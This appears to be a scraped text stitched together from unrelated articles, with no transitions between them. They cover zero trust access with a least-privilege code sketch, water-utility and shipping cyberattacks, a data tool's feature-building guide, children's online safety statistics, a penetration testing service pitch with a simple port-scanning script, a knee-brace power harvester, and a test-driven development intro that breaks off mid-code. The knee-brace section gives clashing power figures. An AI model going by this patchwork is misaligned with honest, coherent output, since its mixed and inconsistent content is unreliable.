How Does Zero Trust Security Work?
Zero trust operates on the premise that threats are constantly present both outside and inside the network, and that every attempt to access the network or an application should be treated as a potential threat. It’s a network security philosophy which holds that no one inside or outside the network should be trusted until their identity has been thoroughly verified. These assumptions underlie the strategy of network administrators, obliging them to design stringent, trustless security measures.
There’s an all-too-common notion that implementing a zero trust architecture requires a complete overhaul of your network. There will certainly be some heavy lifting required, but successful implementation is about having the right framework in place paired with the right tools to execute. Every environment needs to have consistent zero trust. It’s a cultural shift, which is often a bigger change than the technology shift. It involves a mindset and a commitment to changing how access is granted and how security is maintained across the organization.
A Zero Trust Security Strategy Determines the Right Access and the Right Needs
The first step in designing a zero trust architecture is to decide who is allowed to do what – and that’s probably the heaviest lift. You need to determine who gets access to which resources, based on what each individual needs to do their job. Then you need to make sure the devices people are using are properly secured.
Establishing Zero Trust Access (ZTA) involves pervasive application access controls, powerful network access control technologies and strong authentication capabilities. One aspect of Zero Trust Access that focuses on controlling access to applications is Zero Trust Network Access (ZTNA). ZTNA extends the principles of ZTA to verify users and devices before every application session to confirm that they conform to the organization’s policy to access that application. ZTNA supports multi-factor authentication to maintain the highest degree of verification.
Using the zero trust model for application access or ZTNA makes it possible for organizations to rely less on traditional virtual private network (VPN) tunnels to secure assets being accessed remotely. A VPN often provides unrestricted access to the network, which can allow compromised users or malware to move laterally across the network seeking resources to exploit. However, ZTNA applies the policies equally, whether users are on or off the network. So, an organization has the same protections, no matter where a user is connecting from.
The implementation of an effective ZTA security policy must include secure authentication. Many breaches come from compromised user accounts and passwords, so the use of multifactor authentication is key. Requiring users to provide two or more authentication factors to access an application or other network assets adds an extra layer of security to combat cybersecurity threats.
It’s also essential to ensure users don’t have inappropriate or excessive levels of access. Adopting the ZTA practice of applying “least access” privileges as part of access management means that if a user account is compromised, cyber adversaries only have access to a restricted subset of corporate assets. It’s similar to network segmentation but on a per-person basis. Users should only be allowed to access those assets that they need for their specific job role.
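To make the least-access idea concrete, here is a minimal sketch of a role-based access check. The roles, resources, and policy table are hypothetical examples for illustration, not any particular vendor’s implementation.

```python
# Minimal illustration of a least-access (least-privilege) policy check.
# The roles, resources, and policy table below are hypothetical examples.

ROLE_PERMISSIONS = {
    "accounting": {"erp-finance", "expense-reports"},
    "engineering": {"git-server", "ci-pipeline"},
    "hr": {"hr-portal"},
}

def is_access_allowed(user_role: str, resource: str, mfa_verified: bool) -> bool:
    """Grant access only if the user's role needs the resource AND the
    session has passed multi-factor authentication."""
    allowed_resources = ROLE_PERMISSIONS.get(user_role, set())
    return mfa_verified and resource in allowed_resources

# A compromised accounting account still cannot reach engineering assets:
print(is_access_allowed("accounting", "git-server", mfa_verified=True))   # False
print(is_access_allowed("accounting", "erp-finance", mfa_verified=True))  # True
```

Even if the accounting account is compromised, the attacker can only reach the small set of assets that role legitimately needs – the per-person analogue of network segmentation described above.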
Making Sure All the Devices are Secured with Zero Trust
Security of devices also plays a pivotal role in the implementation of an effective zero trust security policy. It is paramount to ensure that the devices people are using have been properly secured. This is particularly important as IoT devices proliferate and become bigger targets for cyberattackers.
Because IoT devices lack the ability to install software and don’t have onboard security features, they are essentially “headless.” As technology has advanced, so has the interconnectedness of IoT ecosystems with the enterprise network and the entirety of the internet.
This new connectivity and the expansion of IP-enabled devices mean IoT devices have become a prime target for cybercriminals. The majority of IoT devices are not designed with security in mind, and many do not have traditional operating systems or even enough processing power or memory to incorporate security features.
A benefit of ZTA is that it can authenticate endpoint and IoT devices to establish and maintain all-inclusive management control and ensure the visibility of every component attached to the network. For headless IoT devices, network access control (NAC) solutions can perform discovery and access control. Using NAC policies, organizations can apply the zero-trust principles of least access to IoT devices, granting only sufficient network access to perform their role.
Developing a Strong Zero Trust Security Policy
When it comes to zero trust security, you need to develop and execute a plan that ensures consistent protocols and policies are implemented across the entire network. No matter who, where, or what they want to access, the rules must be consistent. That means you need to find zero trust security tools that aren’t cloud-only, for example, because if you run a hybrid network, you need the same zero trust on your physical campus as for your remote workers/assets. Comparatively few companies are running cloud-only; most have taken a hybrid approach, and yet many zero trust solution providers are developing cloud-only solutions.
Over the past year, organizations have begun to depend more on hybrid and multi-cloud environments to help support their ongoing digital transformation requirements. According to a recent report from Fortinet, 76% of responding organizations reported using at least two cloud providers.
An important aspect to consider is the difference in each of the cloud platforms. Each has different built-in security tools and functions with different capabilities, command structures, syntax and logic. The data center is still another environment. In addition, organizations may be migrating into and out of clouds. Each cloud offers unique advantages, and it’s essential for the organization to be able to use whichever ones support their business needs; cybersecurity must not hinder that. Yet, with each cloud provider offering different security services using different tooling and approaches, each of your clouds becomes an independent silo in a fragmented network security infrastructure – not an ideal set-up.
But, if you have a common security overlay across all of these data centers and clouds, you provide an abstraction layer above the individual tools that gives you visibility across the clouds, control of them, and the ability to establish a common security posture irrespective of where an application may be, or where it may move to.
Consequently, applications can reside anywhere – from on-campus to branch to data center to cloud. This is why it’s so important to make sure your zero-trust approach can provide the same protocols, no matter where the worker is physically located and how they’re accessing company resources.
Implementing a Zero Trust Architecture for Stronger Security
As the network perimeter continues to dissolve, due in part to edge computing technologies and the global shift to remote work, organizations must make use of every security advantage that exists. That includes knowing how to implement a zero trust security strategy. Because there are so many threats from without and within, it’s appropriate to treat every person and thing trying to gain access to the network and its applications as a threat. Trustless security measures don’t require a total network overhaul but do result in a stronger network shield. By doing the initial hard work of establishing Zero Trust Access and its offshoot, Zero Trust Network Access, you’ll be relieving your IT security team of additional work and significantly upping your security quotient.
Cyber Security for Water & Wastewater
Industrial cyber security is critical for operations, such as water and wastewater, that have a wide-spread impact on public safety. While there has been a general rise in ransomware attacks recently, there are options available for wastewater facilities that secure networks and, ultimately, protect the public.
In an effort to educate industrial companies about how to prevent a cyber attack, we created a series that examines breaches across different industries, the consequences of the breach, and how AutomaTech offerings could have helped.
What Happened: In late April, Israel’s National Cyber Directorate announced there had been attempted cyber attacks on command and control systems for the nation’s wastewater treatment plants, pumping stations, and sewage systems.
The apparent goal for this attack was to raise the chlorine level in the water supply.
How It Happened: Experts believe the attempted attack was a coordinated effort to raise the chlorine levels released into the water while simultaneously sending operators a signal that the chlorine levels were correct.
This means the attack was specifically designed to hide the danger from the control room operators.
Water treatment plants, even in America, are generally considered underprepared against cyber threats, which means few have the tools to detect an attack. This also makes them ideal targets for attackers looking to test methods – essentially using the low level of security of water treatment facilities as a way to “practice” or sell the information for gain. In fact, a water utility facility in Fort Collins, Colorado, has also been hit with ransomware on multiple occasions.
What Were the Aftereffects: While the attempts were unsuccessful, the directorate warned water companies to change their passwords, ensure control system software was updated and take other cyber security measures. If they had been successful, attackers could have caused mild poisoning of the local population.
Israel’s water supply was hit with two more cyber attack attempts in the following months – one on an agricultural water pump – but no serious harm was done.
What Would Have Helped: Bayshore NetWall unidirectional security gateway for IT and OT is a high-speed, hardware and software solution that enforces data replication in only one direction. That means it creates a secure network – shielding and isolating critical assets and sensitive networks from cyber attack and misuse.
Amidst the vast waters of the world’s oceans, one might think they are far away from any kind of criminal threat. However, that assumption is incorrect, as even cargo ships now fall prey to cyberattacks.
Any system connected to an internet network, no matter the location or time, could be a potential target for those with malicious intent. Multiple attacks targeting ships, featuring malware, ransomware, and worms have been witnessed in the past and continue to pose a threat to shipping operations worldwide.
The international shipping industry understands this threat and has recently published updated guidelines for bolstering cybersecurity on ships. A conglomerate of 21 international shipping associations and industry groups has released the third edition of its document on the matter, “Guidelines on Cyber Security onboard Ships”.
The existence of such a document indicates the significance of this issue. A series of attacks over the past few years has pushed the shipping industry to enhance its cybersecurity efforts. Let us look at some of these past incidents which are not widely known by the public.
Nowadays, many modern ships are designed to operate in a paperless way, using the Electronic Chart Display and Information System (ECDIS). However, if this system fails, it could cause a major hindrance in the ship’s operations and result in a large financial loss for the operating company as well. This is exactly what happened in an incident detailed in the document.
“A new-build dry bulk ship was delayed from sailing for several days because its ECDIS was infected by a virus. The ship was designed for paperless navigation and was not carrying paper charts. The failure of the ECDIS appeared to be a technical disruption and was not recognized as a cyber issue by the ship’s master and officers.
“A producer technician was required to visit the ship and, after spending a significant time in troubleshooting, discovered that both ECDIS networks were infected with a virus. The virus was quarantined and the ECDIS computers were restored. The source and means of infection in this case are unknown. The delay in sailing and costs in repairs totalled in the hundreds of thousands of dollars (US).”
The people aboard the ships can also become a part of the threat vector in some cases. The attackers can use infected USB drives and malicious email attachments to deliver malware, which can end up infecting the software systems aboard the ship. The document notes that in one such incident, a shipowner reported that the company’s business networks were infected with ransomware, delivered via an email attachment.
The guideline covers many such incidents and provides recommendations relevant to each of them. It also covers the various aspects of cyber risk management approach.
As modern ships add more and more systems online, the frequency of such attacks is expected to increase. Though some systems are designed with security features in mind, many often lack appropriate security measures.
Just like in the case of network routers and servers, which are often left with their default login credentials unchanged, many ship systems also end up exposed in the same way. Moreover, they sometimes contain built-in backdoor accounts which risk exposure for the ship, cargo, and the passengers onboard.
Last year, the NotPetya ransomware cost the shipping giant Maersk a whopping $300 million, and the damage didn’t end there: 4,000 company servers and 45,000 PCs also had to be reset to ensure the security of the company’s operations.
This incident was a major wake-up call for the shipping industry which is reflected in the latest cybersecurity guidelines.
Use Build Features to create features and establish relationships between data in separate tables. The tool uses primitives to build features from the data you provide.
The Build Features tool has 2 anchors.
- Input anchor: The input anchor connects to the data streams you want to build features from. The 2 angle brackets on the input anchor indicate that it accepts multiple inputs.
- Output anchor: Use the output anchor to pass the data that includes the features you build downstream.
Configure the Tool
To use the Build Features tool, you have to configure options that manage relationships between your data and manage primitives that build the features from your data.
1. Manage Relationships
- Select the Manage Relationships tab. You should see this section by default when you open the Configuration window for the first time.
- Select the Target Table.
- Choose a Primary Key from the dropdown. You only have to choose a primary key for the target table, but selecting a primary key for other tables might help you create relationships, depending on how many relationships you want to create.
- Define parent-child relationships between tables in your data. Choose the Parent table and its Key, as well as the Child table and its Key.
- Select New relationship if you want to add more than one parent-child relationship.
2. Manage Primitives
- After you've created all the relationships you want, go to the Manage Primitives tab.
- Search for the primitives you want to build from the data. To see a list of primitives with their explanations, visit this page.
- Check the box next to those primitives.
- Choose the Table Depth, which specifies how many tables the tool should look at when using aggregation primitives. Those kinds of primitives build features by combining, or aggregating, data from multiple tables.
At a high level, primitives are functions applied to raw data that help build features from it. Those functions can either aggregate or transform the data to build features. Primitives only constrain the input and output of data, so you can apply the same features in many different scenarios. For example, 1 primitive measures the average time between 2 dates. You can apply that primitive in many different scenarios, like to measure the duration of semesters, seasons, or tenures. In that way, a single primitive can be used in different contexts to answer different questions about your data. For more information about how primitives work, visit this page.
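To give a feel for what an aggregation primitive computes, here is a small, illustrative Python sketch of an “average time between” style primitive. The function name and sample data are assumptions for illustration only – this is not the tool’s internal implementation.

```python
from datetime import datetime
from statistics import mean

def avg_time_between(timestamps):
    """Illustrative aggregation primitive: mean gap, in seconds, between
    consecutive events. The same logic applies whether the events are
    semesters, purchases, or log entries."""
    ordered = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    return mean(gaps) if gaps else 0.0

# Example: average time between a customer's orders (child table rows),
# aggregated up to the customer (target/parent table).
orders = [datetime(2022, 1, 1), datetime(2022, 1, 8), datetime(2022, 1, 22)]
print(avg_time_between(orders) / 86400)  # ~10.5 days
```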
Internet safety for kids is a topic that too often isn’t addressed properly. Many people don’t realize the dangers of internet activity, and the need to bolster kids’ online safety is greater than ever.
The stranger danger scare easily applies to a random creepy person your kid might run into on the street. Most kids know better than to go near them.
But what happens when their friend—whom they’ve been opening up to for months, building a solid, trusting emotional relationship—wants to meet in real life?
How does a parent deal with classmates who’ve created a group on social media dedicated solely to humiliating, embarrassing, and spreading rumors about their child?
In the following text and infographic, you’ll learn all the most recent information on internet safety for kids, and the real scale of potential threats.
Latest Kids Online Safety Statistics [Editor’s Choice]
- 70% of kids encounter sexual or violent content online while doing homework research
- 17% of tweens (age 8-12) received an online message with photos or words that made them feel uncomfortable, only 7% of parents were aware of this
- 65% of 8-14 year-olds have been involved in a cyberbullying incident
- 36% of girls and 31% of boys have been bullied online
- 16% of high school students have considered suicide because of cyberbullying
- 75% of children would share personal information online in exchange for goods and services
We collected information from reputable sources: comparative studies with over 100,000 participants, 2018’s Parental Control reports, government websites, Child Protective Services, and cybersecurity companies.
In addition, we examined all aspects of children’s online behavior, such as smartphone ownership rates, time spent online, time spent on social networks, and positive, as well as negative, online experiences.
We took notice of the demographics: data on kids’, tweens’, and teens’ age, gender, and country, including the US, China, Brazil, and Italy.
You’ll see detailed descriptions of kids’ exposure to the most common online threats like cyberbullying, scams, adult content, and online predators.
We also listed just how aware both kids and parents are of issues like online safety for kids, cyberbullying, and children’s overall online presence.
Do kids turn to their parents when they need help with online harassment?
Do parents talk to their kids about how to stay safe online?
Do they use parental control software?
To what degree?
We’ll conclude with some tips on staying safe on the internet, for both parents and their offspring.
We also included the tools and resources that can help you monitor and optimize your kids’ online behavior.
Our goal is to help them make the most of the internet, without falling victim to its many pitfalls.
Sexting, Sextortion, and Trust: How Can We Keep Children Safe from Online Predators?
1. 1 out of 7 children have sent messages with sexual content, while 1 in 4 admits they’ve received these kinds of messages.
A 2018 study came to these worrying conclusions after reviewing 39 studies (with 110,380 participants) in which kids aged 11 to 17 were surveyed. A sext can include language, photos, or videos featuring sexual content.
These kids’ unwitting decisions can ruin lives, damaging their self-esteem and even their future career prospects. This is why they need to understand how to be safe on the internet.
Sometimes kids send pictures consentingly, but after a breakup or a disagreement, a friend or a boyfriend can post them online.
The aggressor’s motivation could be revenge, pettiness, jealousy, or even a minor disagreement. Once the explicit pics are on the web, users can download them, take screenshots, and forward them.
2. 20% of teenagers have sent or posted nude or semi-nude photos or videos of themselves.
According to Guard Child, 26% of teenagers don’t believe that the person to whom they sent the pics will forward them to someone else.
This trust is so complete that 15% of teens have sent or posted this objectionable content to someone they only knew online.
A number of online friends can turn out to be adults, adults posing as kids, classmates, or ex-partners who end up harboring a grudge.
3. 11% of young teen girls aged 13–16 have sent or posted nude or semi-nude photos or videos of themselves.
Kids as young as 13 are particularly vulnerable when it comes to outside influence.
This includes strangers who’ve built a relationship with them over time, as well as their peers and classmates. Kids seek approval, and this need sometimes outweighs common sense.
One of the main conversations you need to have with your kid, therefore, will start with the obvious question, “Why is internet safety important?” Explain the far-reaching consequences of their actions, and help them understand how to protect themselves.
4. The prevalence of forwarding a sext to others without consent is 12%, while only 8.4% of kids admitted someone forwarded a sext to them.
So much for trust, right?
It turns out that peers and even adults posing as peers can ask for explicit pictures of teenagers and then forward them to others without their consent.
If you care about how to keep your kids safe online and on their phones, you must consider this stat.
What’s worse, many kids don’t realize that this is illegal. According to the Department of Justice and Crime Prevention, “if a child aids, abets, induces, incites, instigates, instructs, commands, counsels, or procures another child to take and send such a photo of the latter to the first child or another person, he or she will be guilty of an offense.”
A conviction may lead to a hefty fine, but that’s not the worst part. In particularly nasty cases, a conviction might lead to imprisonment or even registration with the National Register for Sex Offenders.
Sometimes, cyber safety for kids includes making sure your kid is neither the victim nor the aggressor.
5. Suicide is the second most common cause of death in adolescents aged 15–19.
Kids are in more danger of killing themselves than of dying of any sort of disease.
The “deal with it” or “get over it” attitude can only take you so far. In fact, cyberbullying and harassment have conclusively been linked to depression.
Regardless of your attitude, the numbers show that internet safety for kids should be on every parent’s mind.
According to a 2018 paper by Young Minds, young people who use social media are most vulnerable to a low sense of well-being, as well as symptoms of anxiety and depression.
In 2012, 15-year-old Audrie Pott committed suicide after she had been sexually assaulted at a party eight days prior.
The boys who assaulted her posted nude pictures of her online, and accompanied them with bullying and cyberbullying.
Her death was one of the tragedies that started an avalanche, making people around the US face the real danger of cyberbullying and address how to keep kids safe online.
In 2016, a documentary titled Audrie and Daisy premiered at the Sundance Film Festival, detailing the experiences of Audrie Pott and Daisy Coleman, a girl who had similar experiences and survived.
6. Only 25% of the children who’ve received a sexual solicitation told a parent.
According to the Crimes Against Children Research Center, even though kids may place too much trust in peers and even strangers online, the same does not apply to parents. The fear of an overreaction, being blamed, or even something like having internet access taken away can stop kids from asking for help.
7. 20% of teens have met up with an online friend in person.
It’s important that your child knows the importance of cybersecurity and how to stay safe on the internet.
However, what happens when online dangers become a problem offline?
Agreeing to meet a stranger can be a whole new level of dangerous.
A 2015 Pew Research Center report exploring friendship in the digital age conducted a survey involving kids aged 13 to 17. 57% of teens have met a new friend online.
Considering this, it’s no wonder that at least some of them feel comfortable extending that friendship to their offline lives. Making sure you know who your kids are interacting with is certainly among our internet safety tips for raising teens.
8. 1 in 4 stalking victims also reported some form of cyberstalking, often taking place via email (83%) or instant messaging (35%).
People might check social media profiles of their crushes or employees, jokingly referring to this as cyberstalking. But this couldn’t be further from the real danger. Today, the United States has cyberstalking and cyberharassment legislation.
Did you know that the pictures you share online can be traced to your location, even if you don’t tag it on Facebook?
Smartphone location services place a stamp that can be used by computer-savvy web users to find out where a kid is located. To prevent cyberstalking, consider using a VPN, a type of software that encrypts data traffic, making it difficult for others to access your data.
If you, your friends, your child, or your friend’s child are experiencing any of the types of bullying or cyberbullying we’ve discussed, you can get support by calling a suicide hotline number or the national suicide hotline (1-800-273-8255) or by using their chat option, available 24/7 across the US. Trained, experienced individuals will offer compassion, advice, and useful resources.
Internet Safety For Kids – Depression, Cyberbullying, & Social Media Safety
9. 90% of teens who participate in social media have ignored the bullying they’ve witnessed.
Out of said 90%, a third have been victims of cyberbullying themselves. The grin-and-bear-it attitude surrounding this phenomenon has led to many damaging consequences for kids and parents, even though cyberbullying can seem silly to a casual observer.
So what can be done when friends aren’t willing to help?
Keep in mind that young people aged 16–24 spend an average of 34.3 hours a week on the internet.
For teens, cyberbullying is a real problem. Their online presence is at least equally important as how they appear in real life.
It should come as no surprise, then, that kids who’ve experienced cyberbullying can develop serious conditions, including anxiety and depression.
Friendships are destroyed, and in some cases, leaked photos and videos can even cause long-term damage to a kid’s reputation as an adult.
10. 95% of schools already impose some kind of restriction on mobile phones during the school day.
Every school implements its own internet safety practices. Some merely install parental control onto the school’s Wi-Fi, while others forbid mobile phone use during school hours altogether.
Schools want to ensure that kids are safe from risks like cyberbullying, online grooming, and harmful content.
Grooming refers to “when someone builds an emotional connection with a child to gain their trust for the purposes of sexual abuse, sexual exploitation, or trafficking.”
Internet safety for elementary students and middle and high schoolers is important because along with making students safer, it also leaves them more focused on class.
11. According to a 2018 survey, 58% of parents check which websites their teens visit, and look through their kids’ call records and messages.
While most parents resort to checking kids’ online behavior manually, 52% also use software that restricts which websites the child can visit as a way to handle internet safety for kids.
Age plays a big part here: 72% of parents of 13- to 14-year-olds look through their child’s cell phone, compared to 48% of parents of teens aged 15 to 17.
12. Only 25% of teens socialize with friends in person on a daily basis outside of school.
This stat highlights the significance of online communication more than any other. In their free time, kids choose to communicate online, which is why online representation is so important to them.
Learning how to keep kids safe online becomes vital when you see that this is their primary channel for seeking connection, affection, approval, and validation.
13. 16% of boy gamers (13–17) play in person with friends on a daily or near-daily basis, and an additional 35% do so weekly.
With gamer kids, the stats are even worse. Their self-esteem and happiness levels tend to be based on gaming skills.
Internet games for kids and adults alike can become a problem for particularly vulnerable teens.
That’s why ganking (a big group of players teaming up on one lone player) is sometimes categorized as a type of online bullying.
14. 88% of teens online believe people share too much information about themselves on social media.
Pics or it didn’t happen, right? According to a 2018 article by Net Nanny, 10 of the most dangerous teen chat sites—like Kik, Snapchat, Ask.fm, Whisper, and Blendr—can easily bypass parental controls. On Kik, kids can exchange messages parents can’t see, and it’s also very difficult to confirm the participants’ identities.
Snapchat allows users to determine when messages they send will self-destruct, leaving an illusion of anonymity. Screenshots take care of that, of course, proving once more that everything posted online stays online forever.
Among these teenage chatting sites, Ask.fm is so scary that the former UK Prime Minister, David Cameron, urged parents to ban the app.
There are no age restrictions, and groups are formed based on GPS location, a serious liability since potential predators can easily learn a kid’s location.
15. 18% of kids aged 1–7 have social media profiles.
This is another big reason to consider instituting some online safety rules. After all, the age limit for creating an account on Facebook and Instagram is 13.
SnapChat users aged under 13 are redirected to Snapkidz. The minimum age for the mobile phone messaging app WhatsApp is 16 years old.
There are a few ways that you can manage what your kids are doing online. First and foremost, a family password manager is a good idea.
You can make an account for your child on any platform they regularly visit and then enable restricted mode on all the devices they use.
All passwords will be known to you, and you’ll be able to keep them and yourself safe from potential breaches.
16. Around three-quarters of 12–15-year-olds are aware of online reporting functions, and 1 in 8 who go online have used one to report something that bothered them.
Bystander apathy seems to extend to the internet. For those unfamiliar, it’s a social and psychological phenomenon where people are less likely to help a victim when other individuals are present.
17. 17% of children aged 12–15 admitted to accidentally spending money online—almost double the percentage from 2017 (9%).
A 2018 Ofcom report came up with these surprising results. Parents who don’t want to lose money obviously need to provide a sort of kids’ guide to the internet.
It’s a fast way to ensure that if a child blows through their money on trivialities, at least it’s on purpose. Provided that these kids weren’t lying about the accidental nature of their actions, it’s surprising that they seem to know less about the way online purchases work.
18. 45% of kids aged 3–4 use Youtube, 80% use it to watch cartoons, and 40% watch funny videos and pranks.
On the other hand, 70% of kids aged 5–7 use Youtube, and 4% have social media profiles. Here’s a good reason to set up something like Google SafeSearch for kids (but more on that in the next stat).
If you leave your child alone with a mobile device and just let the videos go on shuffle, they can easily be exposed to many violent, frightening, and otherwise damaging videos and images.
Downloading a free adblock program would be a good way to solve this.
You should also provide reliable Android virus protection or get virus protection for any iPhone your kid might use. After all, kids are more likely to unknowingly click on malware or phishing emails than you are.
19. About 8 in 10 parents of 3–15-year-olds online knew about at least 1 of the 6 content filtering tools they were surveyed about. And more than half of parents of 3–4-year-olds (56%) and 5–15-year-olds (59%) used at least one of them.
A website content filter is designed to reduce recreational internet use and restrict access to content that would be deemed objectionable by a parent, school, or enterprise.
A web filter blocks pages from websites that are likely to include objectionable advertising, malware, viruses, and pornographic content. While it’s good that so many parents know about these programs, their use could be even more widespread.
The best free internet filter you can use is Qustodio Free. It may be aimed at Windows, but it’s also available for Mac, Android, iOS, Kindle, and (weirdly) Nook.
Windows Live Family Safety and Open DNS FamilyShield are more family-oriented and will block domains on your whole home network.
If you want to generate only cherry-picked, safe results, Kiddle is probably the best kids’ search engine for you.
20. 19% of parents had no idea whether or not their kids had SnapChat accounts.
In addition, 22% of parents were aware that their children had a Twitter account.
Cyberbullying can become an issue on any social media website. Because of this, not knowing if your kid has a SnapChat account—or any social media account—can be a problem.
21. 59.68% of parental control notifications were triggered by children visiting online communication sites.
All the more reason why social media safety for teens is an issue you ought to take seriously. It seems like no stat was actually needed to let you know your kid spends all of their time on Instagram and SnapChat.
22. 22.4% of parental control notifications were triggered by children’s software, video, or audio consumption.
Images or videos featuring alcohol, tobacco, or narcotics triggered 6.32% of the parental control notifications. And kids’ computer games triggered 4.99% of parental control notifications.
10 Tips About Internet Safety for Kids
- Don’t lie about your age.
- Avoid private forums and chat rooms that require an email address, home address, or phone number.
- Don’t ever give out your own or your family’s personal information.
- Create strong passwords and update them regularly.
- Don’t accept strangers’ friend requests, don’t add strangers, don’t chat with strangers, and never make emotional connections with them.
- Set the privacy settings on your media accounts, make sure your profile details are only visible to friends.
- Never share personal photographs or videos, and never engage in sexting. Everything that happens on the internet stays on the internet forever.
- Disable location services.
- Only purchase items from reputable websites.
- Most of all, block anybody who makes you feel uncomfortable. Report them to your parents, teachers, or even the authorities.
Get the best parental control app for your phone: these options include Qustodio, NetNanny, Symantec Norton Family Premier, Kaspersky Safe Kids, Circle with Disney, Clean Router, and Mobicip.
There are also computer monitoring and parental control software options. These include K9 Web Protection, Qustodio, Family Time, Windows Live Family Safety, Norton Online Family, NetNanny, and Kidlogger.
If you’re looking for Google parental controls, Family Link allows parents to set screen time limits, lock devices when it’s time for a break, approve or block apps downloaded from the Play Store, and locate their kids through their devices. Technically, it’s available to anyone with an existing Google account.
And finally, there is also an Android parental control option: When you turn on parental controls, you can restrict what content can be downloaded or purchased from Google Play based on maturity level.
For family members who manage their own accounts, parental controls only apply to the Android device you add them onto.
For family members whose accounts are managed with Family Link, you can set up parental controls on your child’s Google Account.
So how do you explain internet safety to a child?
Conversations between kids and parents need to include some ground rules: Don’t give away private information about either yourself or your family.
Do not send, download, or forward explicit photos, texts, or videos of either yourself or other kids. Report a bully to the page administrator, a parent, or an authority at your school.
And most of all, be open in your parent-child communication. In the long run, it’s better for you and your kids when they can trust you, not fear you, so that you can work together if something ever does go wrong online.
As we can see, internet safety for kids needs to be as major an issue for parents as what happens in their kids’ offline lives.
Put simply, the stats and tips we’ve provided here are designed to educate you and your kids, while helping you all communicate better about being safe online.
Penetration testing (ethical hacking) is utilized by organizations to validate that their information assets are secure against attacks both from inside and outside the infrastructure. A critical complement to vulnerability scanning, penetration testing proves the extent to which vulnerabilities can be exploited by emulating what a hacker may do in a controlled and methodical manner.
IT Security C&T offers comprehensive Network Penetration Testing to identify security vulnerabilities at the network level, whereby operating systems, web servers, network devices, mail systems, FTP servers, and similar assets are assessed for known security weaknesses and whether they can be exploited. This test reveals a hacker’s view of the network and helps gauge how prepared the network is to defend itself against evolving threats.
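As a simplified illustration of one early step in such a network-level assessment, the sketch below checks whether a few common service ports accept TCP connections. The host name is a placeholder and the port list is an assumption; this is a toy example, not IT Security C&T’s actual methodology, and should only be run against systems you are authorized to test.

```python
import socket

# Toy reconnaissance step: check which common service ports accept TCP
# connections. Only run this against hosts you are authorized to test.
COMMON_PORTS = {21: "FTP", 22: "SSH", 25: "SMTP", 80: "HTTP", 443: "HTTPS"}

def check_open_ports(host: str, timeout: float = 1.0) -> dict:
    results = {}
    for port, service in COMMON_PORTS.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the connection succeeds (port open)
            results[f"{service} ({port})"] = s.connect_ex((host, port)) == 0
    return results

if __name__ == "__main__":
    print(check_open_ports("scanme.example.com"))  # placeholder host
```

A real engagement layers manual verification and exploitation on top of this kind of automated discovery, which is what the deliverables below document.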
- Executive Report: A high-level snapshot of all existing vulnerabilities, activities, and penetration test results
- Detailed Technical Report: This report details the following:
a. Automated vulnerability scanning & reporting
b. Manual verification of vulnerabilities reported (Exploitation of known vulnerabilities)
c. Detailed report including evidence of exploits with attack steps
Researchers have created a new knee brace device that can harvest energy normally dissipated or essentially wasted from the human body during walking.
While it’s not shocking that power can be generated this way, it may be surprising to hear how much electricity the device can produce: five watts, enough to run 10 cell phones.
The journal Science first reported the news and scientific results of a study of the brace, which was created by researchers from Simon Fraser University in Burnaby, British Columbia; the University of Pittsburgh; and the University of Michigan.
Harvesting Wasted Energy
Unlike hand crank-based power generators, the new knee brace doesn’t require much from the user — in fact, the researchers who created the brace found that a human seems to expend less than one watt of energy wearing the brace while the brace harvests a full watt. No scientists have claimed to have messed with the laws of physics here — energy from walking is going somewhere — it’s just that the brace is surprisingly efficient, they say.
“We really wanted to take advantage of the negative work that is being done by the hamstring in trying to decelerate or stop the leg, and that negative work is dissipated as heat, and rather than turning it into heat, we turn it into electricity or power,” Yad Garcha, CEO of Bionic Power, told TechNewsWorld. Bionic Power is a new company formed to develop and market the device for commercial use.
Very Much a Prototype
While long-distance runners may dream of being able to charge their iPods while on the go, real-world use isn’t quite ready for prime time. The knee brace is a prototype, and it needs a bit of work before off-the-grid users will be converting their own power to portable electricity.
“We want to reduce the weight and the size of it,” Garcha said. “Right now, it’s an off-the-shelf brace that we are using, but ideally we could use a brace with this product in mind, and as a result we are in discussions with some of the athletic brace manufacturers to design a very lightweight brace.”
“We need to move the control system on board — currently it resides on our PC,” he explained. “Then we are trying to improve the sensors, so that we know when the subject is walking uphill, downhill, going up stairs or down stairs so that we can vary the amount of power that we are generating. At times we can generate more and sometimes we need to generate less. We want this to be very much in the background and passive, and the only way you can do that is to know exactly what kind of activity is involved.”
In fact, the knee brace actually seems to help the wearers as their foot hits the ground, softening the effort required by the knee and the pressure on the knee during walking. Bionic Power believes that athletic brace manufacturers will be able to make the brace portion of the bionic knee even more ergonomic and comfortable for long-term use.
Forget the Batteries
One of the first places this new device may show up is on the battlefield. Military personnel carry pounds of disposable batteries for a variety of electronic gear. One study, Garcha noted, found that Canadian soldiers carry so many batteries that each soldier’s battery use costs about US$57,000 per year — and American soldiers use even more.
“The problem for the soldier is not just the cost, it is the weight — it’s a limiting factor for them,” Garcha said. To reduce the weight, soldiers have to choose between taking less batteries for their devices, such as critical GPS (global positioning system) or communications units, or taking less food, water or ammunition — none of which are good options.
Other uses may be to power prosthetic devices for disabled persons, provide power in off-the-grid developing nations, or for consumer applications for outdoor enthusiasts who are increasingly taking iPods, cell phones, GPS units and walkie talkies into the backcountry.
Test-Driven Development (TDD) is a development paradigm where tests are written before the code. It may seem like putting the cart before the horse, but the idea is that tests are written to test the design first and then test the code according to the design.
The main hurdle with TDD is that it takes longer to create useable code, but that code will be more stable, easier to integrate, maintain, and update with new features. Even though the initial development takes longer, over the lifespan of the code this is the more efficient approach.
TDD forces the developer to walk through the logic before writing a line of code, which clarifies ideas and provides a better overall understanding of the feature to be implemented. Also, it forces the developer to organize the code to simplify testing, reduce the number of embedded loops and ifs, and consolidate and generalize the code (avoid writing similar code multiple times).
A major part of writing tests involves designing mock test data. Multiple tests will use the same data or a slight variation of it. The test data should be unified, parameterized, and should come from a single source. A comprehensive version of objects to be mocked should be built, even if not all fields will be useful at this stage. The mocked data represents the state for different processing points, so special attention should be paid to the consistency of the data. Mocked data may be used in two ways: as input and to verify the output. This allows for tests to be split into units that work between different execution points in the code.
Small functions should have their dedicated tests, which simplifies testing and simplifies the review of cases and code branches.
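As a minimal sketch of the test-first workflow, the example below uses pytest and a hypothetical `parse_duration` helper: the parameterized test is written first, against a single source of mock data, and only then is the simplest implementation written to make it pass.

```python
import pytest

# Step 1: write the test first, driven by a single, parameterized set of
# mock inputs and expected outputs (the unified test data source).
CASES = [("90s", 90), ("2m", 120), ("1h", 3600)]

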